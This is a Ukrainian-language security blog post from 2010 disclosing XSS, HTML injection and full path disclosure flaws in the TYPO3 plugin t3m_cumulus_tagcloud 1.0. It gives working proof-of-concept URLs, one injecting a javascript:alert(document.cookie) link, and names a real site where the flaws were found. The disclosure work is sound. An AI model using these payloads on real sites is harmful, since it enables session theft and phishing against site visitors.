Уразливості в t3m_cumulus_tagcloud для TYPO3

23:51 01.05.2010

Раніше я вже писав про уразливість в Tagcloud для DLE. Така ж уразливість є і в плагіні t3m_cumulus_tagcloud для TYPO3, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Вчора, 30.04.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в плагіні t3m_cumulus_tagcloud для TYPO3. Уразливості виявив на сайті http://www.hospitalgranada.gov.co. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Full path disclosure:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/class.tx_t3mcumulustagcloud_pi1.php

Уразлива версія t3m_cumulus_tagcloud 1.0.


Leave a Reply

You must be logged in to post a comment.